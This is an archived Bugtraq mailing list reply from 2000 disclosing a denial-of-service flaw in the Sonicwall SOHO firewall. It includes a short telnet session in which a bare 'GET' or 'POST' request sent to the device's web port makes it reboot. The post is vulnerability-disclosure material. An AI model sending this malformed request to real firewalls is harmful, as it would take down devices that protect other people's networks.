[17884] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: DoS in Sonicwall SOHO firewall

daemon@ATHENA.MIT.EDU (Raptor)
Fri Dec 1 13:35:18 2000

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.30.0012011111300.222-100000@hacaro.rewt.mil>
Date:         Fri, 1 Dec 2000 11:12:17 +0100
Reply-To: Raptor <raptor@ANTIFORK.ORG>
From: Raptor <raptor@ANTIFORK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM

Doing some additional tests i've discovered that the thing reboots also
when it receives "strange" HTTP requests. For example:

voodoo:~$ telnet 192.168.87.112 80
Trying 192.168.87.112...
Connected to 192.168.87.112.
Escape character is '^]'.
GET
(then press <CR>)

It works also with POST method: after some seconds the Sonicwall SOHO is
rebooted. I guess the HTTP service needs a full code review...

:raptor

On Wed, 29 Nov 2000, Scott Armstrong wrote:

> I had notified them a few weeks ago but the fix wasn't out so I didn't
> release it.
>
> The reason the firewall stops responding is that it reboots.
>
> Scott

Antifork Research, Inc.                         @ Mediaservice.net Srl
http://raptor.antifork.org                      http://www.mediaservice.net


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[17884] in bugtraq

Re: DoS in Sonicwall SOHO firewall

daemon@ATHENA.MIT.EDU (Raptor)Fri Dec 1 13:35:18 2000

daemon@ATHENA.MIT.EDU (Raptor)
Fri Dec 1 13:35:18 2000